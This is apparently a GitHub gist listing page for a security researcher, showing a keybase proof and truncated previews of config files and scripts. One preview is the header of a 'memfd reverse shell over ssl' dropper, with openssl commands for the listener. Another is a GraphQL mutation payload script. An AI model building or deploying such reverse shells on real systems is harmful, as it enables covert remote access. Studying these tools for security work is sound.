- polk_signa_s2_balanced_eq.txt
I hereby claim:
- I am dualfade on github.
- I am dualfade (https://keybase.io/dualfade) on keybase.
- I have a public key ASDxZONKIzXGIlpJRnbTy8g6851G4ASOjIi8GMQG7W1UpQo
To claim this, I am signing this object:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ~/.tmux.conf | |
| # @dualfade -- | |
| # updated: 03262251 -- | |
| # https://github.com/tmux-plugins/tpm -- | |
| # https://github.com/catppuccin/tmux -- | |
| # https://github.com/catppuccin/tmux/blob/main/docs/reference/configuration.md -- | |
| # https://github.com/catppuccin/tmux/discussions/317#discussioncomment-11451034 -- | |
| # https://github.com/joshmedeski/tmux-nerd-font-window-name -- | |
| # https://upload.wikimedia.org/wikipedia/commons/1/15/Xterm_256color_chart.svg -- | |
| # https://github.com/omerxx/tmux-sessionx -- |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # spdb2lsluice.py | |
| # convert secrets-patterns-db to jsluice secrets format | |
| # @dualfade | |
| # NOTE: refs -- | |
| # https://gist.github.com/dualfade/20f3a56bbbc386be0995a30bf2741169 -- | |
| # https://github.com/BishopFox/jsluice/tree/main/cmd/jsluice#custom-secret-matchers -- | |
| # https://github.com/mazen160/secrets-patterns-db -- |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # gql_mutation_payload.py | |
| # @dualfade | |
| # NOTE: refs -- | |
| # https://dev.to/ivandotv/preventing-graphql-batching-attacks-56o3 | |
| # https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html#mutation-access-data-manipulation | |
| # https://devinschulz.com/rename-fields-by-using-aliases-in-graphql/ | |
| """ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # shellcheck disable=SC2059 | |
| # simulate_typing.sh | |
| # #dualfade -- | |
| # ref -- | |
| # tldr xdotool; https://www.mankier.com/1/xdotool -- | |
| # tldr xclip; https://linux.die.net/man/1/xclip -- | |
| function vdi_clip2win() { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| gomuks v3.0.0 -- | |
| https://github.com/tulir/gomuks | |
| how to remove "Empty Room" in gomuks -- | |
| Do the following -- | |
| Ref: | |
| https://github.com/tulir/gomuks/issues/192#issuecomment-760003730 | |
| Log in to the chomium element web account |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "proxy": { | |
| "ssl_pass_through": { | |
| "automatically_add_entries_on_client_ssl_negotiation_failure": false, | |
| "rules": [ | |
| { | |
| "enabled": true, | |
| "host": ".*\\.google\\.com", | |
| "protocol": "any" | |
| }, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # memfd_rssl_shell.py | |
| # dualfade | |
| # memfd reverse shell over ssl -- | |
| # inspired by; https://0x00sec.org/t/super-stealthy-droppers/3715 -- | |
| # ex: server side -- | |
| # openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem | |
| # openssl s_server -quiet -key server.key -cert server.pem -port 8443 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| KCgrJ18memYyKjcYNQoYdysxN2IpJmJ4WBR2Y389KyZ7OXd9ChZlES4VWUUzPktEIhlEbFsiPSkgQXp_KzgiNCwZfCI1W1xXNiRocH1CIipkIT0gPDJ7MyJ4BQdhaXZkCHIfQys4aEV0cSg4F3sxOyB-NA== |
NewerOlder